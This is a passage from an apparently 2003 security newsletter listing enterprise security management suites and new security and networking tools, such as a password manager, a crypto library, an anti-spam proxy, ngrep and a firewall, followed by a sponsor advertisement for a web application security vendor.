critical security applications from antivirus protection to file and
network encryption from one single console. The administrator can
automatically and remotely install, configure and update the applications.
It is possible to manage the security applications on almost any device
and across the enterprise so that even the security of mobile workers'
laptops is guaranteed. In addition to all this, the administrator can
easily monitor the network by generating extensive reports on the security
status of the network.
3. Gordano Messaging Suite
By: Gordano
Platforms: AIX, Linux, Solaris, Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.gordano.com/
Summary:
Gordano's Messaging Suite provides robust and secure email, instant and
SMS messaging for small, medium and large businesses.
4. LANDesk Management Suite 7
By: LANDesk Software
Platforms: AIX, HP-UX, Linux, MacOS, Solaris, Windows 2000, Windows 95/98,
Windows NT, Windows XP
Relevant URL: http://www.landesk.com/products/ilms/
Summary:
LANDesk Management Suite 7 is a comprehensive, integrated management
solution that's easy to use. Enabling proactive management of desktops,
server and mobile devices across heterogeneous IT environments.
- Keep up with security patches and virus updates
- Efficiently install and maintain software on the desktop
- Decrease software license costs and respond to audits
- Reduce the cost of helpdesk support
- Discover and manage hardware and software assets
- Migrate many users and their profiles to new operating systems
5. McAfee ePolicy Orchestrator
By: Network Associates
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm
Summary:
McAfee Security ePolicy Orchestrator (ePO) is the market-leading tool for
centralized policy management of malicious threat protection. ePO allows
you to maintain up-to-date protection, configure and enforce policies, and
generate detailed graphical reports on McAfee Security and third party
products, including Symantec and Dr Ahn anti-virus products.
6. Enterprise Manager
By: Sophos
Platforms: Windows 2000, Windows NT
Relevant URL: http://www.sophos.com/products/em/
Summary:
The Enterprise Manager suite is a powerful set of tools allowing fully
automated web-based installation and updating of Sophos software across a
network and even to remote users.
Network administrators are put in full control and can monitor their
network at all times. Unprotected computers or those running an
out-of-date version of Sophos Anti-Virus can be immediately and
automatically updated. In practice, a network of 1000 or more clients can
be updated from a single, central Windows machine within five minutes.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. Password Manager XP v1.5
By: CP-Lab
Relevant URL: http://www.cp-lab.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Password Manager XP is a program that helps you to systematize any secret
information stored on your PC. It will be your passwords and secrets
keeper. Protect your private data with this password management utility.
Password Manager XP allows you to create several databases for storing
your secret information. Each database has an access password and is
encrypted with various algorithms at the same time (Blowfish, 3DES,
Rijndael, Tea, Cast128, RC4, Serpent, Twofish). You can store data in
different databases under your own passwords. You can create passwords
databases at shared resource and access them from multiple computers
across the network. Install to removable device Wizard will help you to
install the Password Manager XP to the removable devices such a USB flash
drives. It is easily integrated into Microsoft Internet Explorer. It helps
you to surf the Web more safely. Password Manager XP has a built-in
password generator with many adjustable functions.
2. beecrypt v3.1.0
By: Bob Deblier, bob.deblier (at) pandora (dot) be [email concealed]
Relevant URL: http://sourceforge.net/projects/beecrypt/
Platforms: Linux, Solaris, UNIX, Windows 2000, Windows 95/98, Windows NT
Summary:
BeeCrypt is an ongoing project to provide strong and fast cryptography in
the form of a toolkit usable by commercial and open source projects.
Included in the library are entropy sources, random generators, block
ciphers, hash functions, message authentication codes, multiprecision
integer routines, and public key primitives.
3. Anti-Spam SMTP Proxy v1.0.0
By: John Hanna
Relevant URL: http://assp.sourceforge.net/
Platforms: BSDI, Linux, MacOS, Os Independent, OS/2, Perl (any system
supporting perl), POSIX, Windows 2000, Windows NT
Summary:
The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open
source platform independent SMTP Proxy server which implements whitelists
and Bayesian filtering to help stop unsolicited commercial email (UCE).
Anti-spam tools should be adaptive to new spam and customized for each
site?s email patterns. This easy to use tool works with any mail transport
and achieves these goals requiring no operator intervention after the
initial setup phase.
4. ngrep v1.41
By: Jordan Ritter <jpr5 (at) darkridge (dot) com [email concealed]>
Relevant URL: http://ngrep.sourceforge.net/
Platforms: AIX, Digital UNIX/Alpha, FreeBSD, IRIX, Linux, OpenBSD,
Solaris, Windows 2000, Windows 95/98, Windows NT
Summary:
ngrep strives to provide most of GNU grep's common features, applying them
to the network layer. ngrep a pcap-aware tool that will allow you to
specify extended regular expressions to match against data payloads of
packets. It currently recognizes TCP and UDP across ethernet, ppp and slip
interfaces, and understands bpf filter logic in the same fashion as more
common packet sniffing tools like tcpdump and snoop.
5. Securepoint Firewall and VPN Server v3.1.3 P3
By: Lutz Hausmann
Relevant URL: http://www.securepoint.cc/
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
Securepoint Firewall and VPN Server is a high-performance application
designed to offer full protection for network assets. The Security Manager
offers a graphical user interface with many features, different
configurations, and advanced reporting functions. The Securepoint server
is a complete firewall and VPN software system with an operating system
based on a secure Linux. VPN operation supports PPTP and IPSec (X.509
certificates, preshared, RSA signature). You can use the firewall on a
standard PC with 2 to 16 network cards (including Ethernet, ADSL, ISDN).
It is very easy to install and administer. The Securepoint Security
Manager is available in English, German, and Spanish, and works in online
and offline mode.
6. libdvdcss v1.2.8
By: Samuel Hocevar <sam (at) zoy (dot) org [email concealed]>
Relevant URL: http://www.videolan.org/libdvdcss/
Platforms: BeOS, FreeBSD, Linux, OpenBSD, Windows 2000, Windows 95/98,
Windows NT
Summary:
libdvdcss is a cross-platform library for transparent DVD device access
with on the fly CSS decryption. It currently runs under Linux, FreeBSD,
NetBSD, OpenBSD, BSD/OS, Solaris, BeOS, Win98, Win2k and MacOS X. It is
used for the vlc DVD player because of its portability and because, unlike
similar libraries, it does not require your DVD drive to be region-locked.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/sponsor/KaVaDo_ms-secnews_030825
------------------------------------------------------------------------
-------
[ reply ]